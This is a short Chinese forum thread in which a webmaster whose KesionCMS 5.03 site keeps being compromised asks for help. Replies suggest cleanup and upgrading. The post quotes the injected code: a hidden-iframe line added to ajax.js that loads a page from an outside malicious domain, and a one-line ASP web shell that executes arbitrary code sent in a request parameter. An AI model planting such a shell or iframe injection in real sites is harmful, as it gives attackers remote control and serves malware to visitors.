用科汛5.03做的网站，三番五次被挂木马，现在求助，他们把ajax.js文件增加了document.writeln("<iframe src=http:\/\/www.bg8028.cn\/one\/a15.htm width=50 height=0><\/iframe>")

并且在wwwroot下增加了一个文件，代码是这样写的<%if request ("x")<>""then session("shs")=request("x"):end if:if session("shs")<>"" then execute session("shs")%>现在求助啊，漏洞在哪里

谢谢了

http://bbs.kesion.com/dispbbs.asp?boardid=42&Id=48882

参考安全教程,做好安全工作,把恶意代码找出来彻底删除,另外建议升级到最新版本

这个跟什么做的无关吧，只要做好安全准备。

科汛是开放的，某些决心眼的想搞破比较容易了解情况。http://www.y7711.com我的用时候也被挂的。